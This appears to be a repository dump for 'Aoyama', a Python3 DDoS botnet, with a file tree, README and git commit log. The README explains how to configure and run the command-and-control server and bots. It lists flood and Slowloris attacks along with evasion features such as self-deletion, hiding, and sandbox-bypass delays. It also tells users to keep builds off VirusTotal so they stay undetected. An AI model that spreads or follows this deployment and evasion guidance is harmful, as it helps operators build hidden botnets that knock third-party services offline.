======================: FILES :======================
Aoyama
├── client.py
├── cnc.py
├── LICENSE
├── login.txt
├── README.md
└── xor.py

0 directories, 6 files
======================: README CONTENT :======================
# Aoyama ![](https://img.shields.io/badge/Version-2.0-brightgreen.svg)  ![](https://img.shields.io/badge/license-GPL2.0-green.svg)
Aoyama is a New version of Python3 botnet, old version: http://github.com/Leeon123/Python3-botnet

Aoyama is for ddos(Maybe add more function later, such as...keylogger?)

***PLS Don't scan the executable file generated from pyinstaller or py2exe on any virus scanner(such as VirusTotal), if you want to keep using this project(i will continue update the code) and not be detected*** 

**~~Plese run the cnc.py in linux, run in windows will have bug when login to cnc(idk why but i will try to fix it)~~**

**Fixed**

**Test video(OLD): https://www.youtube.com/watch?v=W4YR-cf3xD0**

[Virustotal (Old)](https://www.virustotal.com/gui/file/4d4ef809d67cd70708567527e48540fdce61d76f0034b774396130612e17e0da/detection)
## News&Features
**BOT(V2):**
- [x] **Added Port Scanner**
- [x] Improved Code
- [x] Added Slowloris attack
- [x] Improved attack process
- [x] Auto enable ssl when attack
- [x] Encrypted traffic(xor)
- [x] Deamon(only linux)(PS: You can use pyinstaller option '--noconsole' on windows)
- [x] Hide itself(linux: Deamon + delete itself | windows: Hide sys.argv[0])
- [x] Added single instance mode
- [x] Startup delay 30~90(random) seconds to bypass some sandbox scanning

**CNC(V2):**
- [x] Decrease delay of send command
- [x] Support Telnet Login
- [x] Encrypted traffic(xor)
- [x] Coloured CNC
- [x] Using login.txt to check account.(Need improve, sometime may have bugs)
- [x] Keep-alive connection
- [x] Using telnet to connect
- [x] Using 'ping/pong' to check bot connection status(use 'scan' to check it by yourself or it checks every **15 seconds**.)

## Opinion:
In my opinion, best way is using **python v3.4.3** and **pyinstaller v3.2**. They are the best pattern i tested and used.

## Usage:
***Change*** the cnc server ip and port into the client.py **at first**.

Then, edit the password of cnc.py and run the cnc.py:

    python3 cnc.py <port>
    
At Last, run the bot.py in any python3 environment(IDE, codeanywhere,etc.) or u can use pyinstaller to help u

then the **Bot** is online.

***To login cnc***, using **telnet(Updated after v2)** connect it then

It should be show like this:

        Username:
        
At this moment, u should create a file called login.txt and input the username and password in it

Like this:

        Leeon123 test

After that, Just input ur username and password.
        
                    
            Username:Leeon123
            Password:test
            
---

Credits:
 - [Leeon123](https://github.com/Leeon123), writing the botnet
 - [Nexus](https://github.com/Nexuzzzz), adding more methods
====================== GIT HISTORY: ======================
5b241a2 HEAD@{0}: clone: from https://github.com/Leeon123/Aoyama
commit 5b241a2c809ae28426b76b003d1263090fcbe82a
Merge: 3157fdb c731149
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Wed Mar 23 17:49:43 2022 +0800

    Merge pull request #11 from Nexuzzzz/patch-2
    
    Update README.md

commit 3157fdbe183311504eec43e55f5826eb55600b9b
Merge: f7feae4 9a331b1
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Wed Mar 23 17:49:28 2022 +0800

    Merge pull request #10 from Nexuzzzz/patch-1
    
    [Update] added 2 more DDoS attacks  + more

commit c731149374d8e333be1de50a6b5e894c6148bc5a
Author: Nexus <78029616+Nexuzzzz@users.noreply.github.com>
Date:   Wed Sep 15 21:17:46 2021 +0200

    Update README.md

commit 9a331b139b4264d8ff3ec29a4be312e54e412916
Author: Nexus <78029616+Nexuzzzz@users.noreply.github.com>
Date:   Wed Sep 15 21:15:01 2021 +0200

    [Update] added 2 more DDoS attacks  + more
    
    Added STD attack (randomized UDP flood)
    Added VSE attack (UDP flood for Valve servers)
    Changed syntax a bit
    Added some credits lol

commit f7feae457f35a8734a4d6a2aa212901854ab1686
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Sun Jan 31 12:56:57 2021 +0800

    Update README.md

commit 5cae3a1091e6ff49584d6d7cbb1dca77962d5f99
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Tue Jan 19 18:58:36 2021 +0800

    Update cnc.py

commit 68c23578256cafad29f7b188c034549e79a9b73a
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Jan 14 13:13:45 2021 +0800

    Update cnc.py

commit d2d46e739215151cc9c56d50fd159f33d1628983
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Mon Jan 4 08:29:33 2021 +0800

    quick fix

commit 4b2cdc6b03e17ec01871feaed5b6a0c9f136994b
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Mon Dec 14 00:01:00 2020 +0800

    Fixed high cpu usage

commit 790ed0c30b5ee4530094b03e989d59eca22ac7dd
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Sat Dec 12 09:55:28 2020 +0800

    Update README.md

commit e79679b3f96dd2a1eeedf423f67a29e9599dd34b
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Fri Nov 20 23:25:53 2020 +0800

    Add files via upload

commit 8754a5058622a0c2c02253067f16ad6b9008c93c
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Fri Nov 20 23:25:42 2020 +0800

    Update README.md

commit ca38e18ca791b2ebeb67e2989445efb06853f289
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Fri Nov 20 23:15:16 2020 +0800

    Fix the bug in windows

commit 99c9c1758c53a7f383153212ce32c0d335477e69
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Sat May 2 13:20:41 2020 +0800

    Add files via upload

commit 81dd254080872366f65428b9d879b24607fdcc14
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Apr 9 12:56:55 2020 +0800

    Add files via upload

commit e0f7b6f95595bbe0c63a9e0e623b183178365f5d
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Apr 9 12:51:19 2020 +0800

    Add files via upload

commit 9f3184cf25d7c8b5c16824bc4da102446f476d3d
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Apr 9 12:38:47 2020 +0800

    Add files via upload

commit a64164528abd623d0e363d3909d225bcb3c1ab92
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Apr 9 12:36:44 2020 +0800

    Simple fixed

commit 9dd8a5857668f1e74cc7138c2908e83459984bbf
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Apr 9 12:35:10 2020 +0800

    some fixed

commit 8c591d37364d6a5bcad36f683af989676421760e
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Mon Jan 13 16:35:29 2020 +0800

    Random setup time

commit f2f04b5a745f3011b910c2948ffdcb8337c04f06
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Jan 9 20:49:29 2020 +0800

    Update README.md

commit 5d2266fdfc53be9f357c113b87348fe8e3f2554e
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Jan 9 20:46:51 2020 +0800

    Fixed windows hide file

commit e7dab7d4b9ccf5aa0186d118592335b0f61c9158
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Jan 9 20:46:12 2020 +0800

    Update README.md

commit f4eb3fc3c01c15532c4de36e46ee948394616657
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Jan 9 20:41:48 2020 +0800

    v2.0
    
    B1g update
    [+] Scanner
    [+] Improved Code

commit 12126d0419caa30070f3c171c3f810d8d5f09eef
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Sun Jul 28 00:05:15 2019 +0800

    Update README.md

commit af9a0eeaeb2332b9bd484b5250c094c83d751635
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Fri Jul 19 12:41:33 2019 +0800

    Update README.md

commit 991f5135752840d0ac6d85cb513f6907c9ba0ab9
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Jul 18 22:09:47 2019 +0800

    Update README.md

commit d739838f69507fed8e14e2da5e12ece1c72f2f5b
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Jul 18 22:00:34 2019 +0800

    Aoyama v1.1

commit b2f807633c14e0f2218e98b1c7991203612bff30
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Thu Jul 18 12:44:11 2019 +0800

    Update README.md

commit e69aa4e011f72235a3c130e4aba08e3aff721c80
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Wed Jul 17 22:31:17 2019 +0800

    Update README.md

commit 1a0f37958715587264beebd3972af47c8fa50885
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Wed Jul 17 14:59:42 2019 +0800

    Update README.md

commit 6f521435f874823ef2fc31aeb658855992c3b26c
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Wed Jul 17 14:50:42 2019 +0800

    New design

commit aa155e8fd1632db18c142ea93627b14c910d6d27
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Tue Jul 16 23:44:27 2019 +0800

    Improved magic loop

commit b7c6ad27503d9f81590708fcf91f6e761a1e6c56
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Tue Jul 16 21:30:33 2019 +0800

    Update README.md

commit 49c73f972679091e83f78a3f9d3b8a2d598d3e79
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Tue Jul 16 21:27:02 2019 +0800

    Update README.md

commit 1dbbbd64117b41951c2943fef917b61fc089e401
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Tue Jul 16 21:26:10 2019 +0800

    Update README.md

commit fb6fa67de4e2e108d49e88294f38cfa9ca3e4616
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Tue Jul 16 21:25:54 2019 +0800

    Update README.md

commit e1ae1216e5e7e6153da4b535c5197fb3ca37729a
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Tue Jul 16 21:20:59 2019 +0800

    Aoyama v1

commit 7d12dd5d39ac2abdf31f2529f1ff74a6e7eccaa3
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Tue Jul 16 21:20:30 2019 +0800

    Update README.md

commit 20401b95abd8aeb458c9d8baa0c079ab23a16bdc
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Tue Jul 16 21:18:40 2019 +0800

    Update README.md

commit eea1a6e25f8a5a8b03e5d92ce79797031d52b8d5
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Tue Jul 16 21:16:12 2019 +0800

    Update README.md

commit 016b2feaa31d671593bc6412b76e2cbc6f68f2b8
Author: Leeon123 <leeon123ex@gmail.com>
Date:   Tue Jul 16 21:04:08 2019 +0800

    Initial commit
